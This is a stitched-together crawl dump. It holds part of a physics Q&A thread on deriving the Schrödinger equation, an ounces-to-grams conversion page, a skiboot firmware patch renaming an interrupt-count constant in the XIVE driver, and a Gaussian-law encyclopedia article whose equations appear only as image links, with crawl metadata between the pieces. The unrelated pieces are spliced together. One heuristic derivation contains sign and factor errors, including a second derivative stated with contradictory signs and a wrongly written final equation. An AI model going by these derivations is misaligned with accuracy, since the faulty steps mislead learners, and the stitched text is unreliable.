\\frac{dx_{k+1}}{A} \\frac{dx_{k+2}}{A}...$$\n\nNow consider the above equation if we want to know the amplitude at the next instant in time $t+\\epsilon$:\n\n$$\\psi(x_{k+1},t+\\epsilon)=\\int_{R} \\exp\\left[\\frac{i}{\\hbar}\\sum_{i=-\\infty}^{k}S(x_{i+1},x_i)\\right]\\frac{dx_{k}}{A} \\frac{dx_{k-1}}{A}...$$\n\nThe above is similar to the equation preceding it, the difference relying on the hint that, the added factor with $\\exp(i/\\hbar)S(x_{k+1},x_k)$ does not involve any of the terms $x_i$ before $i<k$, so the integration can be preformed with all such terms factored out. All this reduces the last equation to:\n\n$$\\psi(x_{k+1},t+\\epsilon)=\\int_{R} \\exp\\left[\\frac{i}{\\hbar}\\sum_{i=-\\infty}^{k}S(x_{i+1},x_i)\\right]\\psi(x_k,t)\\frac{dx_{k}}{A}$$\n\nNow a quote from Feynman's original paper, regarding the above result:\n\nThis relation giving the development of $\\psi$ with time will be shown, for simple examples, with suitable choice of $A$, to be equivalent to Schroedinger's equation. Actually, the above equation is not exact, but is only true in the limit $\\epsilon \\to 0$ and we shall derive the Schroedinger equation by assuming this equation is valid to first order in $\\epsilon$. The above need only be true for small $\\epsilon$ to the first order in $\\epsilon.$\n\nIn his original paper, following up the calculations for 2 more pages, from where we left things, he then shows that:\n\nCanceling $\\psi(x,t)$ from both sides, and comparing terms to first order in $\\epsilon$ and multiplying by $-\\hbar/i$ one obtains\n\n$$-\\frac{\\hbar}{i}\\frac{\\partial \\psi}{\\partial t}=\\frac{1}{2m}\\left(\\frac{\\hbar}{i}\\frac{\\partial}{\\partial x}\\right)^2 \\psi + V(x) \\psi$$ which is Schroedinger's equation.\n\nI would strongly encourage you to read his original paper, don't worry it is really well written and readable.\n\nReferences: Space-Time Approach to Non-Relativistic Quantum Mechanics by R. P. Feynman, April 1948.\n\nFeynman Path Integrals in Quantum Mechanics, by Christian Egli\n\n• The Schroedinger Equation is simply the Hamiltonian ie. Kinetic + Potential energy as a function of momenta and coordinates alone, written with Quantum operators for momentum replacing the classical definition of momentum. Hamilton's equation is well known from Classical Physics, has been tested for ~2 Centuries, and is easy to use. The only 'new' idea is the Quantum operator for momentum, which isn't intuitive or obvious, but is used because it gives the correct answer. – Arif Burhan Mar 5 '16 at 17:41\n• Do you, per chance, have a link to Schroedinger's papers in English? – MadPhysicist Apr 22 '17 at 21:12\n• @MadPhysicist unfortunately I cannot find the very early ones in English, but at least there's his paper on \"An Undulatory Theory of the Mechanics of Atoms and Molecules\". Among the very first ones by Heisenberg and afterwards Schrödinger were \"Über quantentheoretische Umdeutung kinematischer und mechanischer Beziehungen.\" and \"Quantisierung als Eigenwertproblem\" respectively. Try to look for the English translation of these. What are you exactly interested in? Maybe I can recommend more modern material to you. – Phonon Apr 23 '17 at 15:59\n• I was particularly interested in his papers pertaining to expanding on the work of de Broglie and producing the Schroedinger equation. – MadPhysicist Apr 24 '17 at 9:59\n\nAccording to Richard Feynman in his lectures on Physics, volume 3, and paraphrased \"The Schrodinger Equation Cannot be Derived\". According to Feynman it was imagined by Schrodinger, and it just happens to provide the predictions of quantum behavior.\n\n• See also this – HDE 226868 Oct 19 '14 at 21:56\n• That was in the 1960's. But I also found this 2006 paper in the American Journal of Physics: arxiv.org/abs/physics/0610121 which claims a derivation. – docscience Oct 19 '14 at 21:59\n\nFundamental laws of physics cannot be derived (turtles all the way down and all that).\n\nHowever, they can be motivated in various ways. Direct experimental evidence aside, you can argue by analogy - in case of the Schrödinger equation, comparisons to Hamiltonian mechanics and the Hamilton-Jacobi equation, fluid dynamics, Brownian motion and optics have been made.\n\nAnother approach is arguing by mathematical 'beauty' or necessity: You can look at various ways to model the system and go with the most elegant approach consistent with constraints you imposed (ie reasoning in the vein of 'quantum mechanics is the only way to do X' for 'natural' or experimentally necessary values of X).\n\nWhile it is in general impossible to derive the laws of physics in the mathematical sense of the word, a strong motivation or rationale can be given most of the time. Such impossibility arises from the very nature of physical sciences which attempt to stretch the all-to-imperfect logic of the human mind onto the natural phenomena around us. In doing so, we often make connections or intuitive hunches which happen to be successful at explaining phenomena in question. However, if one had to point out which logical sequence was used in producing the hunch, he would be at a loss - more often than not such logical sequence simply does not exist.\n\n\"Derivation\" of the Schroedinger equation and its successful performance at explaining various quantum phenomena is one of the best (read audacious, mind-boggling and successful) examples of the intuitive thinking and hypothesizing which lead to great success. What many people miss is that Schroedinger simply took the ideas of Luis de Broglie further to their bold conclusion.\n\nIn 1924 de Broglie suggested that every moving particle could have a wave phenomenon associated with it. Note that he didn't say that every particle was a wave or vice versa. Instead, he was simply trying to wrap his mind around the weird experimental results which were produced at the time. In many of these experiments, things which were typically expected to behave like particles also exhibited a wave behavior. It is this conundrum which lead de Broglie to produce his famous hypothesis of $\\lambda = \\frac{h}{p}$. In turn, Schroedinger used this hypothesis as well as the result from Planck and Einstein ($E = h\\nu$) to produce his eponymous equation.\n\nIt is my understanding that Schroedinger originally worked using Hamilton-Jacobi formalism of classical mechanics to get his equation. In this, he followed de Broglie himself who also used this formalism to produce some of his results. If one knows this formalism, he can truly follow the steps of the original thinking. However, there is a simpler, more direct way to produce the equation.\n\nNamely, consider a basic harmonic phenomenon:\n\n$y = A sin (wt - \\delta)$\n\nfor a particle moving along the $x$-axis,\n\n$y = A sin \\frac{2\\pi v}{\\lambda} (t - \\frac{x}{v})$\n\nSuppose we have a particle moving along the $x$-axis. Let's call the wave function (similar to the electric field of a photon) associated with it $\\psi (x,t)$. We know nothing about this function at the moment. We simply gave a name to the phenomenon which experimentalists were observing and are following de Broglie's hypothesis.\n\nThe most basic wave function has the following form: $\\psi = A e^{-i\\omega(t - \\frac{x}{v})}$, where $v$ is the velocity of the particle associated with this wave phenomenon.\n\nThis function can be re-written as\n\n$\\psi = A e^{-i 2 \\pi \\nu (t - \\frac{x}{\\nu\\lambda})} = A e^{-i 2 \\pi (\\nu t - \\frac{x}{\\lambda})}$, where $\\nu$ - the frequency of oscillations and $E = h \\nu$. We see that $\\nu = \\frac{E}{2 \\pi \\hbar}$ The latter is, of course, the result from Einstein and Planck.\n\nLet's bring the de Broglie's result into this thought explicitly:\n\n$\\lambda = \\frac{h}{p} = \\frac{2\\pi \\hbar}{p}$\n\nLet's substitute the values from de Broglie's and Einstein's results into the wave function formula.\n\n$\\psi = A e^{-i 2 \\pi (\\frac{E t}{2 \\pi \\hbar} - \\frac{x p}{2 \\pi \\hbar})} = A e^{- \\frac{i}{\\hbar}(Et - xp)} (*)$\n\nthis is a wave function associated with the motion of an unrestricted particle of total energy $E$, momentum $p$ and moving along the positive $x$-direction.\n\nWe know from classical mechanics that the energy is the sum of kinetic and potential energies.\n\n$E = K.E. + P.E. = \\frac{m v^2}{2} + V = \\frac{p^2}{2 m} + V$\n\nMultiply the energy by the wave function to obtain the following:\n\n$E\\psi = \\frac{p^2}{2m} \\psi + V\\psi$\n\nNext, rationale is to obtain something resembling the wave equation from electrodynamics. Namely we need a combination of space and time derivatives which can be tied back into the expression for the energy.\n\nLet's now differentiate $(*)$ with respect to $x$.\n\n$\\frac{\\partial \\psi}{\\partial x} = A (\\frac{ip}{\\hbar}) e^{\\frac{-i}{\\hbar}(Et - xp)}$\n\n$\\frac{\\partial^2 \\psi}{\\partial x^2} = -A (\\frac{p^2}{\\hbar^2}) e^{\\frac{-i}{\\hbar}(Et - xp)} = \\frac{p^2}{\\hbar^2} \\psi$\n\nHence, $p^2 \\psi = -\\hbar^2 \\frac{\\partial^2 \\psi}{\\partial x^2}$\n\nThe time derivative is as follows:\n\n$\\frac{\\partial \\psi}{\\partial t} = - A \\frac{iE}{\\hbar} e^{\\frac{-i}{\\hbar}(Et - xp)} = \\frac{-iE}{\\hbar}\\psi$\n\nHence, $E \\psi = \\frac{-\\hbar}{i} \\frac{\\partial \\psi}{\\partial t}$\n\nThe expression for energy we obtained above was $E\\psi = \\frac{p^2}{2m} \\psi + V\\psi$\n\nSubstituting the results involving time and space derivatives into the energy expression, we obtain\n\n$\\frac{-i}{\\hbar} \\frac{\\partial \\psi}{\\partial t} = \\frac{- \\hbar ^2}{2m} \\frac{\\partial ^2 \\psi}{\\partial x^2} + V\\psi$\n\nThis, of course, became better known as the Schroedinger equation.\n\nThere are several interesting things in this \"derivation.\" One is that both the Einstein's quantization and de Broglie's wave-matter hypothesis were used explicitly. Without them, it would be very tough to come to this equation intuitively in the manner of Schroedinger. What's more, the resulting equation differs in form from the standard wave equation so well-known from classical electrodynamics. It does because the orders of partial differentiation with respect to space and time variables are reversed. Had Schrodinger been trying to match the form of the classical wave equation, he would have probably gotten nowhere.\n\nHowever, since he looked for something containing $p^2\\psi$ and $E\\psi$, the correct order of derivatives was essentially pre-determined for him.\n\nNote: I am not claiming that this derivation follows Schroedinger's work. However, the spirit, thinking and the intuition of the times are more or less preserved.\n\nIn Mathematics you derive theorems from axioms and the existing theorems.\n\nIn Physics you derive laws and models from existing laws, models and observations.\n\nIn this case we can start from the observations in photoelectric effect to get the relation between photon energy and frequency. Then continue with the special relativity where we observed the speed of the light is constant in all reference frames. From this when generalizing the kinetic energy we can get the mass energy equivalence. Combining the two we can assign mass to the photon, consequently we can get the momentum of a photon as function of the wavenumber.\n\nGeneralizing the energy-frequency and the momentum-wavenumber relation when have the De-Broglie relations. Which is applicable to any particles.\n\nAssuming that a particle have 0 energy when it stands still (you can do it), although it doesn't cause too much trouble if you leave the constant term there, in the later phases you can simply put it into the left side of the equation. We can deal with the kinetic energy. Substituting the non-relativistic kinetic into the relation and reordering we can have the following dispersion relation:\n\n$$\\omega = \\frac{\\hbar k^2}{2m}$$\n\nThe wave equation can be derived from the dispersion relation of the matter waves using the way I mentioned in that answer.\n\nIn this case we will need the laplacian and first time derivative:\n\n$$\\nabla^2 \\Psi + \\partial_t \\Psi = -k^2\\Psi - \\frac{i \\hbar k^2}{2m}\\Psi$$\n\nMultiplying the time derivative with $-\\frac{2m}{i\\hbar}$, we can zero the right side:\n\n$$\\nabla^2 \\Psi - \\frac{2m}{i\\hbar} \\partial_t \\Psi = -k^2\\Psi + k^2\\Psi = 0$$\n\nWe can reorder it to obtain the time dependent schrödinger equation of a free particle:\n\n$$\\partial_t \\Psi = \\frac{i\\hbar}{2m} \\nabla^2 \\Psi$$\n\nTo my mind there are two senses in which we can \"derive\" a result in physics. New theories try to address the shortcomings of older ones by upgrading what we already have, giving new results. They also recover old results. I suppose we can call both derivations.\n\nFor example, the TISE and TDSE were first obtained because quantum mechanics said that, where classical mechanics would imply $f=0$, we should have $\\hat{f}\\left|\\psi\\right\\rangle = 0$, with $\\hat{f}$ the operator promotion of $f$, which in this case is $f=E-\\frac{p^2}{2m}-V$ with operators $E=i\\hbar\\partial_t,\\,\\mathbf{p}=-i\\hbar\\boldsymbol{\\nabla}$. (Some results become the weaker $\\left\\langle\\psi\\right|\\hat{f}\\left|\\psi\\right\\rangle = 0$, e.g. with $f=\\frac{d\\mathbf{p}}{dt}+\\boldsymbol{\\nabla}V$, so I'm not being entirely honest here. But we expect $\\hat{E}$-eigenstates are important because the probability distribution of $E$ is conserved.)\n\nNote that the above paragraph summarises how Schrödinger was derived in the first sense, and its ending parenthesis hints at how Newton's second law was \"derived\" in my second sense. And everyone talking about path integrals is hinting at a type-2 derivation for both results (path integrals obtain a transition amplitude in terms of $e^{iS}$ with $S$ the classical action now miraculously coming out of a hat, so technically our direct recovery is of Lagrangian mechanics rather than the equivalent Newtonian formulation).\n\nI'll leave people to fight over which, if either, type of derivation is \"valid\" or \"better\", but physical insight requires frequent doses of both. I think it's worth distinguishing them in a discussion like this.\n\n## protected by Qmechanic♦Oct 20 '14 at 20:11\n\nThank you for your interest in this question. Because it has attracted low-quality or spam answers that had to be removed, posting an answer now requires 10 reputation on this site (the association bonus does not count).\n\nWould you like to answer one of these unanswered questions instead?" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90485865,"math_prob":0.99384356,"size":18967,"snap":"2019-35-2019-39","text_gpt3_token_len":4975,"char_repetition_ratio":0.12793334,"word_repetition_ratio":0.006590357,"special_character_ratio":0.2559709,"punctuation_ratio":0.09039227,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99976856,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-19T10:07:06Z\",\"WARC-Record-ID\":\"<urn:uuid:2fc2cfc1-acf8-49cd-9817-c6bb7143ac8d>\",\"Content-Length\":\"193437\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:63b7f33d-066c-4b9f-9dc4-7ef531cb1298>\",\"WARC-Concurrent-To\":\"<urn:uuid:30e0d759-1cd4-4016-97f1-7b47c72bf26d>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://physics.stackexchange.com/questions/142169/how-can-one-derive-schr%C3%B6dinger-equation/158743\",\"WARC-Payload-Digest\":\"sha1:WQV2IDJ32SY3XPWJKTKGVGLH7QOSGFJP\",\"WARC-Block-Digest\":\"sha1:X6YIAYDL3FAEFTIF2Z5M62SAC57TLV64\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027314721.74_warc_CC-MAIN-20190819093231-20190819115231-00006.warc.gz\"}"}
https://ounces-to-grams.appspot.com/pl/1332-uncja-na-gram.html
[ "Ounces To Grams\n\n# 1332 oz to g1332 Ounce to Grams\n\noz\n=\ng\n\n## How to convert 1332 ounce to grams?\n\n 1332 oz * 28.349523125 g = 37761.5648025 g 1 oz\nA common question is How many ounce in 1332 gram? And the answer is 46.9849173169 oz in 1332 g. Likewise the question how many gram in 1332 ounce has the answer of 37761.5648025 g in 1332 oz.\n\n## How much are 1332 ounces in grams?\n\n1332 ounces equal 37761.5648025 grams (1332oz = 37761.5648025g). Converting 1332 oz to g is easy. Simply use our calculator above, or apply the formula to change the length 1332 oz to g.\n\n## Convert 1332 oz to common mass\n\nUnitMass\nMicrogram37761564802.5 µg\nMilligram37761564.8025 mg\nGram37761.5648025 g\nOunce1332.0 oz\nPound83.25 lbs\nKilogram37.7615648025 kg\nStone5.9464285714 st\nUS ton0.041625 ton\nTonne0.0377615648 t\nImperial ton0.0371651786 Long tons\n\n## What is 1332 ounces in g?\n\nTo convert 1332 oz to g multiply the mass in ounces by 28.349523125. The 1332 oz in g formula is [g] = 1332 * 28.349523125. Thus, for 1332 ounces in gram we get 37761.5648025 g.\n\n## 1332 Ounce Conversion Table", null, "## Alternative spelling\n\n1332 Ounces to Grams, 1332 Ounces in Grams, 1332 oz in Grams, 1332 oz to Gram, 1332 Ounces in g, 1332 Ounce in Grams, 1332 Ounce to Gram, 1332 Ounce to g," ]
[ null, "https://ounces-to-grams.appspot.com/image/1332.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7840364,"math_prob":0.9835712,"size":881,"snap":"2023-14-2023-23","text_gpt3_token_len":310,"char_repetition_ratio":0.2086659,"word_repetition_ratio":0.0,"special_character_ratio":0.46878546,"punctuation_ratio":0.15270936,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97461057,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-23T20:33:09Z\",\"WARC-Record-ID\":\"<urn:uuid:6a7c6830-ed16-4c4b-8a0b-6612e112db6f>\",\"Content-Length\":\"28538\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:de6f1a7e-5dba-41d7-ae03-79328fc3956e>\",\"WARC-Concurrent-To\":\"<urn:uuid:223cc47d-fc40-4ad3-8ce3-4ec33f242780>\",\"WARC-IP-Address\":\"142.251.163.153\",\"WARC-Target-URI\":\"https://ounces-to-grams.appspot.com/pl/1332-uncja-na-gram.html\",\"WARC-Payload-Digest\":\"sha1:YONCL7MIMX2N4GERMHBMZ7RBPDFEFA4H\",\"WARC-Block-Digest\":\"sha1:YVORMM6AR5M5VLC2TV6CTEKZ2X4XWPJO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296945183.40_warc_CC-MAIN-20230323194025-20230323224025-00406.warc.gz\"}"}
https://lists.ozlabs.org/pipermail/skiboot/2020-June/017044.html
[ "# [Skiboot] [PATCH v2 01/11] xive/p9: Introduce XIVE_INT_ORDER\n\nCédric Le Goater clg at kaod.org\nFri Jun 12 21:37:22 AEST 2020\n\n```The size of the interrupt number space is constrained by the block and\nindex fields of the trigger data exchanged between source units and\nthe XIVE IC. These are respectively 4 and 28 bits, which gives us a 32\nbits interrupt number space. But the XICS emulation requires 8 bits to\nencode the CPPR value. The system interrupt number space is therefore\nconstrained to 24 bits and on a chip, to 20 bits because the XIVE\ndriver configures the HW to use one block per chip.\n\nXIVE_INT_ORDER defines the size of the interrupt number space : 1M per\nchip.\n\nTo control these interrupts, the driver defines in the VC BAR of the\ncontroller a range of 384G of ESB pages giving access to 3M interrupts.\nThe VSD for the memory table is smaller than the index and accesses to\nsome ESB pages are not backed by a memory table structure. If such an\naccess occurred, it would result in a FIR.\n\nIt never happened but this is something to fix with a finer configuration\nof the VC BAR.\n\nSigned-off-by: Cédric Le Goater <clg at kaod.org>\n---\nhw/xive.c | 34 ++++++++++++++++++++--------------\n1 file changed, 20 insertions(+), 14 deletions(-)\n\ndiff --git a/hw/xive.c b/hw/xive.c\nindex 9c9123fb6f3c..68504cc3b7c7 100644\n--- a/hw/xive.c\n+++ b/hw/xive.c\n@@ -146,18 +146,24 @@\n* so we could potentially make the IVT size twice as big, but for now\n* we will simply share it and ensure we don't hand out IPIs that\n* overlap the HW interrupts.\n+ *\n+ * TODO: adjust the VC BAR range for IPI ESBs on this value\n*/\n-#define MAX_INT_ENTRIES\t\t(1 * 1024 * 1024)\n+\n+#define XIVE_INT_ORDER\t\t20 /* 1M interrupts */\n+#define XIVE_INT_COUNT\t\t(1ul << XIVE_INT_ORDER)\n\n/*\n* First interrupt number, also the first logical interrupt number\n- * allocated by Linux\n+ * allocated by Linux (the first numbers are reserved for ISA)\n*/\n#define XIVE_INT_FIRST\t\t0x10\n\n/* Corresponding direct table sizes */\n-#define SBE_SIZE\t(MAX_INT_ENTRIES / 4)\n-#define IVT_SIZE\t(MAX_INT_ENTRIES * 8)\n+\n+#define SBE_PER_BYTE\t 4 /* PQ bits couples */\n+#define SBE_SIZE\t (XIVE_INT_COUNT / SBE_PER_BYTE)\n+#define IVT_SIZE\t (XIVE_INT_COUNT * sizeof(struct xive_ive))\n\n/* Max number of EQs. We allocate an indirect table big enough so\n* that when fully populated we can have that many EQs.\n@@ -376,7 +382,7 @@ struct xive {\n* and partially populated.\n*\n* Currently, the ESB/SBE and the EAS/IVT tables are direct and\n-\t * fully pre-allocated based on MAX_INT_ENTRIES.\n+\t * fully pre-allocated based on XIVE_INT_COUNT.\n*\n* The other tables are indirect, we thus pre-allocate the indirect\n* table (ie, pages of pointers) and populate enough of the pages\n@@ -760,7 +766,7 @@ static struct xive_ive *xive_get_ive(struct xive *x, unsigned int isn)\nxive_err(x, \"xive_get_ive, ISN 0x%x not on right chip\\n\", isn);\nreturn NULL;\n}\n-\t\tassert (idx < MAX_INT_ENTRIES);\n+\t\tassert (idx < XIVE_INT_COUNT);\n\n/* If we support >1 block per chip, this should still work as\n* we are likely to make the table contiguous anyway\n@@ -1624,7 +1630,7 @@ static bool xive_prealloc_tables(struct xive *x)\n}\n/* SBEs are initialized to 0b01 which corresponds to \"ints off\" */\nmemset(x->sbe_base, 0x55, SBE_SIZE);\n-\txive_dbg(x, \"SBE at %p size 0x%x\\n\", x->sbe_base, SBE_SIZE);\n+\txive_dbg(x, \"SBE at %p size 0x%lx\\n\", x->sbe_base, SBE_SIZE);\n\n/* EAS/IVT entries are 8 bytes */\nx->ivt_base = local_alloc(x->chip_id, IVT_SIZE, IVT_SIZE);\n@@ -1636,7 +1642,7 @@ static bool xive_prealloc_tables(struct xive *x)\n* when actually used\n*/\nmemset(x->ivt_base, 0, IVT_SIZE);\n-\txive_dbg(x, \"IVT at %p size 0x%x\\n\", x->ivt_base, IVT_SIZE);\n+\txive_dbg(x, \"IVT at %p size 0x%lx\\n\", x->ivt_base, IVT_SIZE);\n\n/* Indirect EQ table. (XXX Align to 64K until I figure out the\n* HW requirements)\n@@ -2595,7 +2601,7 @@ static struct xive *init_one_xive(struct dt_node *np)\n* so that HW sources land outside of ESB space...\n*/\nx->int_base\t= BLKIDX_TO_GIRQ(x->block_id, 0);\n-\tx->int_max\t= x->int_base + MAX_INT_ENTRIES;\n+\tx->int_max\t= x->int_base + XIVE_INT_COUNT;\nx->int_hw_bot\t= x->int_max;\nx->int_ipi_top\t= x->int_base;\n\n@@ -2611,9 +2617,9 @@ static struct xive *init_one_xive(struct dt_node *np)\n/* Make sure we don't hand out 0 */\nbitmap_set_bit(*x->eq_map, 0);\n\n-\tx->int_enabled_map = zalloc(BITMAP_BYTES(MAX_INT_ENTRIES));\n+\tx->int_enabled_map = zalloc(BITMAP_BYTES(XIVE_INT_COUNT));\nassert(x->int_enabled_map);\n-\tx->ipi_alloc_map = zalloc(BITMAP_BYTES(MAX_INT_ENTRIES));\n+\tx->ipi_alloc_map = zalloc(BITMAP_BYTES(XIVE_INT_COUNT));\nassert(x->ipi_alloc_map);\n\nxive_dbg(x, \"Handling interrupts [%08x..%08x]\\n\",\n@@ -3382,7 +3388,7 @@ static bool check_misrouted_ipi(struct cpu_thread *me, uint32_t irq)\nif (!x)\ncontinue;\nive = x->ivt_base;\n-\t\t\t\tfor (i = 0; i < MAX_INT_ENTRIES; i++) {\n+\t\t\t\tfor (i = 0; i < XIVE_INT_COUNT; i++) {\nif (xive_get_field64(IVE_EQ_DATA, ive[i].w) == irq) {\neq_blk = xive_get_field64(IVE_EQ_BLOCK, ive[i].w);\neq_idx = xive_get_field64(IVE_EQ_INDEX, ive[i].w);\n@@ -4397,7 +4403,7 @@ static void xive_reset_one(struct xive *x)\nlock(&x->lock);\n\n/* Check all interrupts are disabled */\n-\ti = bitmap_find_one_bit(*x->int_enabled_map, 0, MAX_INT_ENTRIES);\n+\ti = bitmap_find_one_bit(*x->int_enabled_map, 0, XIVE_INT_COUNT);\nif (i >= 0)\nxive_warn(x, \"Interrupt %d (and maybe more) not disabled\"\n\" at reset !\\n\", i);\n@@ -4405,7 +4411,7 @@ static void xive_reset_one(struct xive *x)\n/* Reset IPI allocation */\nxive_dbg(x, \"freeing alloc map %p/%p\\n\",\nx->ipi_alloc_map, *x->ipi_alloc_map);\n-\tmemset(x->ipi_alloc_map, 0, BITMAP_BYTES(MAX_INT_ENTRIES));\n+\tmemset(x->ipi_alloc_map, 0, BITMAP_BYTES(XIVE_INT_COUNT));\n\nxive_dbg(x, \"Resetting EQs...\\n\");\n\n--\n2.25.4\n\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6034009,"math_prob":0.94230694,"size":5683,"snap":"2021-43-2021-49","text_gpt3_token_len":1789,"char_repetition_ratio":0.12731114,"word_repetition_ratio":0.03337306,"special_character_ratio":0.34400845,"punctuation_ratio":0.15862069,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9585438,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-27T12:58:31Z\",\"WARC-Record-ID\":\"<urn:uuid:d0090495-9c69-4a76-b651-40e3760ca493>\",\"Content-Length\":\"9207\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7b0d58c9-abec-4f53-9b7f-fb943f131b84>\",\"WARC-Concurrent-To\":\"<urn:uuid:3dafda59-d008-4f8a-b839-d491d49dbed1>\",\"WARC-IP-Address\":\"112.213.38.117\",\"WARC-Target-URI\":\"https://lists.ozlabs.org/pipermail/skiboot/2020-June/017044.html\",\"WARC-Payload-Digest\":\"sha1:JKVXQEYQXTVDHM5HXFK7ZIFVD2LVNMC5\",\"WARC-Block-Digest\":\"sha1:ONCSBEWPQVZAS75SF6WMJBGRL7JZRDX3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588153.7_warc_CC-MAIN-20211027115745-20211027145745-00484.warc.gz\"}"}
https://www.conservapedia.com/Gauss%27s_Law
[ "# Gauss's Law\n\nJump to: navigation, search\n\nGauss's Law states that the electric flux through a closed surface is proporational to the electrical charge inside. This holds true regardless of the volume or shape of the closed surface. This is one of the most fundamental principles of electrodynamics, and is one of Maxwell's Equations. The law is named after Carl Friedrich Gauss. It is useful for calculating the electric field around distributions of charges with lots of symmetry.\n\nIn integral form, Gauss's Law is this:", null, "where", null, "is the electric flux through the surface S,", null, "is the electric field,", null, "is a differential area on the closed surface S with an outward facing surface normal defining its direction,", null, "is the charge enclosed by the surface,", null, "is the charge density at a point in", null, ",", null, "is a constant for the permittivity of free space and the integral", null, "is over the surface S enclosing volume V.\n\nIt can also be written in differential form as:", null, "where", null, "is the charge density.\n\n## Proof of equivalency\n\nIt is easy to show that the differential and integral forms of Gauss's law are equivalent. This can be done by integrating the differential form over a volume:", null, "As integral of charge density over volume is the charge contained within that volume, the integral can be replaced with QA. Using the Divergence theorem, the left hand side can be changed from a volume integral of a divergence into a surface integral with no divergence across the surface of the volume, S. This produces the integral form:", null, "## Example of use\n\nGauss's law is useful when there is a lot of symmetry in a problem. An example of that is a sphere of uniform charge density, and radius R. We choose a surface over which we can easily evaluate:", null, "This surface is known as a \"Gaussian surface\". We choose it so that", null, "term in the dot product evaluates simply to either 1 or 0. In our example of a sphere, we choose a spherical Gaussian surface of radius r. This means that all the small vector elements dA point radially outwards and as the electric field due to the sphere will be radial,", null, "and", null, "will always be parallel. This means the", null, "terms will be:", null, "This is the left handside. The right hand side depends on the charge enclosed by the surface and therefore r. This means the electric field takes a different form inside and outside the sphere. Outside the sphere, the charge enclosed is", null, "while inside it is", null, ". This means the electric field inside and around the sphere is:", null, "where", null, "is a unit vector pointing radially outwards. Note that outside the sphere, the field drops off according to an inverse square law. This means that it is the same as if the sphere were a point particle. This is a much simpler calculation than integrating electric field component of each point particle in the sphere." ]
[ null, "https://www.conservapedia.com/images/math/2/b/d/2bd9a0be48efac65fba8e876d30012a6.png ", null, "https://www.conservapedia.com/images/math/5/7/1/571286850423e91db6d2802a4857bf03.png ", null, "https://www.conservapedia.com/images/math/8/e/8/8e8116f4c23bed15b93ac618d36294ac.png ", null, "https://www.conservapedia.com/images/math/0/1/e/01e96a62abcd531934e14e96bd960819.png ", null, "https://www.conservapedia.com/images/math/c/e/2/ce2f3273e59ef55260559598451a884e.png ", null, "https://www.conservapedia.com/images/math/f/7/f/f7f177957cf064a93e9811df8fe65ed1.png ", null, "https://www.conservapedia.com/images/math/5/2/0/5206560a306a2e085a437fd258eb57ce.png ", null, "https://www.conservapedia.com/images/math/1/9/4/194e6ffe4e750045519c0b272c482f35.png ", null, "https://www.conservapedia.com/images/math/a/a/f/aaf4fbd7b790122e497d0e93db25f807.png ", null, "https://www.conservapedia.com/images/math/8/a/4/8a4b39618a55b97742128cd3569b81b7.png ", null, "https://www.conservapedia.com/images/math/f/7/f/f7f177957cf064a93e9811df8fe65ed1.png ", null, "https://www.conservapedia.com/images/math/6/a/f/6aff74608fc2107bc959d95251f008e1.png ", null, "https://www.conservapedia.com/images/math/6/c/6/6c6f24c78dc9058a4e0bb6e7c41e79e5.png ", null, "https://www.conservapedia.com/images/math/f/b/1/fb1a6e98cd7a882980fef1347929d72b.png ", null, "https://www.conservapedia.com/images/math/e/0/b/e0bfb6af519eec310bed905a113eac98.png ", null, "https://www.conservapedia.com/images/math/8/e/8/8e8116f4c23bed15b93ac618d36294ac.png ", null, "https://www.conservapedia.com/images/math/0/1/e/01e96a62abcd531934e14e96bd960819.png ", null, "https://www.conservapedia.com/images/math/e/0/b/e0bfb6af519eec310bed905a113eac98.png ", null, "https://www.conservapedia.com/images/math/c/1/e/c1eeb53cc75231f92b8609e2d9de1091.png ", null, "https://www.conservapedia.com/images/math/e/c/2/ec2117fd7c200e62182380a3e10d200f.png ", null, "https://www.conservapedia.com/images/math/e/0/6/e06ae3ad4e262961eb1326bbbcc4cb2c.png ", null, "https://www.conservapedia.com/images/math/9/f/e/9fe56e79d224ddf932b56e2f62cc9a5c.png ", null, "https://www.conservapedia.com/images/math/8/6/2/862fae21895bfafdb6a6c9da30c5269e.png ", null ]
